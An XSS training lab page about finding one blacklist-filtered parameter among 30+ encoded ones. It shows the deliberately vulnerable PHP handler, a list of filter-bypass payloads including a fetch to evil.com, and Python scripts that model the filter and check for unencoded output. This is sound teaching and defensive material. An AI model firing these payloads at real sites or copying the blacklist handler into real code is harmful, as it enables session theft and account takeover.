Needle in a Haystack XSS Lab

Find the one vulnerable parameter hidden among 30+ secure parameters

Needle in a Haystack Challenge

Lab Overview

This lab demonstrates a real-world scenario where most parameters are properly secured, but one parameter uses blacklist filtering instead of proper encoding. With over 30 parameters using htmlspecialchars(), you need to find the single vulnerable parameter.

Mixed Security Implementation: 30+ parameters use htmlspecialchars() encoding (secure), but one parameter uses blacklist filtering (vulnerable).
Parameter Discovery Challenge: There are over 30 parameters to test. Use a parameter discovery tool such as Arjun to enumerate them all and find the vulnerable one!
Hint: You already found this vulnerable parameter in Lab No. 2. Look for patterns from previous challenges!
Parameter Security Levels:
  • Secure: 30+ parameters use htmlspecialchars()
  • Vulnerable: 1 parameter uses blacklist filtering
  • Realistic Scenario: mixed security implementations are common
  • Discovery Challenge: find the needle in the haystack
Sample Parameters (Partial List):
  • fname: Secure - htmlspecialchars()
  • lname: Secure - htmlspecialchars()
  • q: Secure - htmlspecialchars()
  • search: Secure - htmlspecialchars()
  • keyword: Secure - htmlspecialchars()
  • query: Secure - htmlspecialchars()
  • page: Secure - htmlspecialchars()
  • email: Secure - htmlspecialchars()
  • username: Secure - htmlspecialchars()
  • password: Secure - htmlspecialchars()
  • ???: Vulnerable - Blacklist filtering
  • ...: Secure - htmlspecialchars()
Secure Parameters (30+):
  Input:  <script>alert(1)</script>
  Output: &lt;script&gt;alert(1)&lt;/script&gt;
Vulnerable Parameter (1):
  Input:  <script>alert(1)</script>
  Output: <>alert(1)</>
One parameter among many uses blacklist filtering instead of proper encoding, creating a hidden vulnerability.
Overall Security Level: Mixed Security

Objective: Discover all parameters and find the single vulnerable one that uses blacklist filtering instead of proper encoding.

Backend Source Code
// 30+ parameters use secure encoding
if(isset($_GET["fname"]) && isset($_GET["lname"])){
    echo htmlspecialchars($_GET["fname"], ENT_QUOTES);
    echo htmlspecialchars($_GET["lname"], ENT_QUOTES);
}
elseif(isset($_GET["q"])){
    echo htmlspecialchars($_GET["q"], ENT_QUOTES);
}
// ... 30+ more parameters with htmlspecialchars()

// One parameter uses vulnerable blacklist filtering
elseif(isset($_GET["???"])){
    $arr = array('details','alert','confirm','prompt','eval',
                'ontoggle','onmousemove','onmouseover',
                'script','Script','sCript','scRipt','scrIpt',
                'scriPt','scripT','SCript','SCRipt','SCRIpt',
                'SCRIPt','SCRIPT','img','image','svg','onfocus');
    $re = str_replace($arr, '', $_GET['???']);
    echo $re;
}
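The snippet above hinges on the difference between removing keywords and encoding the output context. The following Python model is an added example, not code from the lab: it reproduces the semantics of PHP's str_replace() with an array (one case-sensitive pass per keyword, in array order, no re-scan of text produced by an earlier removal) using the exact blacklist printed in the backend snippet, models htmlspecialchars($v, ENT_QUOTES) with html.escape(), and adds an output-side check that asks the only question that matters for the HTML body context: do raw metacharacters still reach the page? Note that because the printed array also contains 'alert', the model returns <>(1)</> for the lab's sample input rather than the <>alert(1)</> shown in the sample output; the tag delimiters survive either way, which is the point. The function names and the sample inputs other than the lab's own are my own.

```python
import html
import re

# Blacklist copied from the lab's backend snippet, in the same order that
# PHP's str_replace() applies it.
BLACKLIST = ['details', 'alert', 'confirm', 'prompt', 'eval',
             'ontoggle', 'onmousemove', 'onmouseover',
             'script', 'Script', 'sCript', 'scRipt', 'scrIpt',
             'scriPt', 'scripT', 'SCript', 'SCRipt', 'SCRIpt',
             'SCRIPt', 'SCRIPT', 'img', 'image', 'svg', 'onfocus']


def blacklist_filter(value: str) -> str:
    """Model of str_replace($arr, '', $value): each keyword is removed in a
    single case-sensitive pass, in array order. Nothing is encoded, so every
    HTML metacharacter in the input survives untouched."""
    for word in BLACKLIST:
        value = value.replace(word, '')
    return value


def html_encode(value: str) -> str:
    """Model of htmlspecialchars($value, ENT_QUOTES): & < > " and ' become
    entities, so the browser can no longer read them as markup. (PHP emits
    &#039; for the single quote where Python emits &#x27;; both are inert.)"""
    return html.escape(value, quote=True)


# A raw < > " ' or an & that does not start a well-formed entity.
RAW_METACHAR = re.compile(r'[<>"\']|&(?![A-Za-z]+;|#[0-9]+;|#x[0-9A-Fa-f]+;)')


def leaks_markup(rendered: str) -> bool:
    """Output-side check for the HTML body context: True when the string that
    reaches the page still contains characters the parser would treat as
    markup. This is independent of which keywords a filter removed."""
    return RAW_METACHAR.search(rendered) is not None


def compare(payload: str) -> dict:
    """Run one input through both handlers and report which one leaks markup."""
    filtered = blacklist_filter(payload)
    encoded = html_encode(payload)
    return {
        'blacklist_output': filtered,
        'blacklist_leaks_markup': leaks_markup(filtered),
        'encoded_output': encoded,
        'encoded_leaks_markup': leaks_markup(encoded),
    }


if __name__ == '__main__':
    # First input is the lab's own sample; the other two are constructed.
    for p in ['<script>alert(1)</script>', '<b>hello</b>', 'O\'Reilly & "Sons"']:
        print(repr(p), '->', compare(p))
```

The leaks_markup() check is the kind of assertion worth putting in a test suite for every reflected parameter: it does not care what the input looked like, only whether the response still carries raw HTML metacharacters, so it catches the one parameter whose handler differs from the other thirty without needing a payload list.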
Test Input Forms
Visible Parameters (HTML Encoded): both visible form fields use htmlspecialchars() encoding.
Hidden Parameters (Mixed Security): Challenge: There are 30+ hidden parameters. Most are secure, but one uses blacklist filtering. Use parameter discovery tools! Every hidden field uses htmlspecialchars() encoding except one, which uses blacklist filtering - XSS possible!
XSS Bypass Techniques for the Vulnerable Parameter
String Concatenation Bypass:
  • <script>window['al'+'ert'](1)</script>
  • <script>this['al'+'ert'](1)</script>
  • <script>self['al'+'ert'](1)</script>
  • <script>top['al'+'ert'](1)</script>
Alternative Tags/Events:
  • <iframe src=javascript:alert(1)>
  • <body onload=window['al'+'ert'](1)>
  • <marquee onstart=alert(1)></marquee>
  • <object data=javascript:alert(1)>
Character Encoding Bypass:
  • <script>window['alert'](1)</script>
  • <script>window['\x61lert'](1)</script>
  • <script>window['\141lert'](1)</script>
  • <script>window[`al${''}ert`](1)</script>
Alternative Functions:
  • <script>print()</script>
  • <script>open()</script>
  • <script>console.log(1)</script>
  • <script>fetch('http://evil.com')</script>
Blacklist Filter Analysis:

The vulnerable parameter filters these keywords:

script alert confirm prompt eval ontoggle onmousemove onmouseover onfocus img image svg details

Plus multiple case variations of 'script'

Security Implications

Mixed security implementations demonstrate:

  • One vulnerable parameter can compromise an entire application
  • Security consistency is critical across all parameters
  • Parameter discovery is essential for comprehensive testing
  • Blacklist filtering provides a false sense of security
  • Legacy code or new features may introduce vulnerabilities
  • Automated tools may miss single vulnerable parameters
Best Practices

For secure web applications:

  • Apply consistent security controls to ALL parameters
  • Use context-aware output encoding instead of blacklists
  • Implement strict Content Security Policy (CSP) headers
  • Test all parameters with comprehensive security testing
  • Use parameter discovery tools during security assessments
  • Implement security code reviews for all changes
  • Assume attackers will find and exploit any inconsistency
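The "security code review" and "consistent controls on ALL parameters" points above are the defender's version of the needle-in-a-haystack search: in a file with dozens of echo statements, the one that prints request data without htmlspecialchars() is easy to miss by eye. The script below is an added example (not part of the lab) that does a deliberately simple, line-based taint check over a constructed PHP excerpt modelled on the backend snippet: request superglobals are sources, variables assigned from them are tainted unless cast to int, str_replace() does not untaint, and only an echo wrapped directly in htmlspecialchars()/htmlentities() counts as encoded. The sample source, the parameter name "needle" and the function names are mine; a real review would use a proper PHP parser, but the rule it encodes is the same.

```python
import re

# Constructed PHP excerpt modelled on the lab's backend: many encoded sinks,
# one blacklist-filtered sink, and one integer-cast sink.
SAMPLE_PHP = r'''
if(isset($_GET["fname"]) && isset($_GET["lname"])){
    echo htmlspecialchars($_GET["fname"], ENT_QUOTES);
    echo htmlspecialchars($_GET["lname"], ENT_QUOTES);
}
elseif(isset($_GET["q"])){
    echo htmlspecialchars($_GET["q"], ENT_QUOTES);
}
elseif(isset($_GET["search"])){
    $s = $_GET["search"];
    echo htmlspecialchars($s, ENT_QUOTES);
}
elseif(isset($_GET["needle"])){
    $arr = array('script','alert');
    $re = str_replace($arr, '', $_GET['needle']);
    echo $re;
}
elseif(isset($_GET["page"])){
    $p = (int)$_GET["page"];
    echo $p;
}
'''

SOURCE = re.compile(r'\$_(GET|POST|REQUEST|COOKIE)\b')   # taint sources
ASSIGN = re.compile(r'^\s*(\$\w+)\s*=(?!=)\s*(.+);\s*$')  # $var = expr;
SINK = re.compile(r'^\s*(?:echo|print)\s+(.+);\s*$')      # echo expr;
VAR = re.compile(r'\$\w+')
INT_CAST = re.compile(r'^\s*(\(int\)|intval\()')          # neutralises taint
ENCODERS = ('htmlspecialchars(', 'htmlentities(')


def is_tainted(expr: str, tainted: set) -> bool:
    """An expression is tainted if it reads a request source directly or
    uses a variable that was assigned from one."""
    if SOURCE.search(expr):
        return True
    return any(v in tainted for v in VAR.findall(expr))


def is_encoded(expr: str) -> bool:
    """Only a sink whose whole expression is wrapped in an HTML encoder is
    treated as safe for the HTML body context. Keyword stripping is not."""
    return any(expr.lstrip().startswith(e) for e in ENCODERS)


def find_unencoded_echoes(php: str) -> list:
    """Return (line number, stripped line) for every echo/print of tainted
    data that is not passed through an HTML encoder."""
    tainted = set()
    findings = []
    for lineno, line in enumerate(php.splitlines(), 1):
        m = ASSIGN.match(line)
        if m:
            var, rhs = m.group(1), m.group(2)
            if is_tainted(rhs, tainted) and not INT_CAST.match(rhs):
                tainted.add(var)
            else:
                tainted.discard(var)   # reassignment from a clean value
            continue
        m = SINK.match(line)
        if m:
            expr = m.group(1)
            if is_tainted(expr, tainted) and not is_encoded(expr):
                findings.append((lineno, line.strip()))
    return findings


if __name__ == '__main__':
    for lineno, text in find_unencoded_echoes(SAMPLE_PHP):
        print(f'line {lineno}: unencoded request data reaches the page: {text}')
```

Run over the sample it reports exactly one line, the echo of the str_replace() result; the integer-cast parameter is not reported because the cast leaves nothing for the HTML parser to interpret. The rule is intentionally blunt (it flags any tainted echo not wrapped directly in an encoder), which is the right bias for a consistency review: a false positive costs a glance, a missed sink costs the application.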
Real-World Security Implications
Common Mixed Security Scenarios:
  • Legacy code: Older parameters may have different security
  • Third-party integrations: External code may use different approaches
  • Developer inconsistency: Different teams may implement security differently
  • Feature additions: New features may not follow established patterns
Impact of Single Parameter Vulnerability:
  • Complete application compromise through one entry point
  • Session hijacking through cookie theft
  • Account takeover attacks
  • Data exfiltration and privacy breaches
  • Reputation damage despite overall good security
Comprehensive Prevention Strategies:
  • Security consistency: Apply same security controls to all parameters
  • Context-aware encoding: Use proper encoding for each output context
  • Comprehensive testing: Test all parameters with various payloads
  • Parameter discovery: Use tools to find all parameters during testing
  • Security headers: Implement CSP, X-XSS-Protection, etc.
  • Code review: Review all code changes for security consistency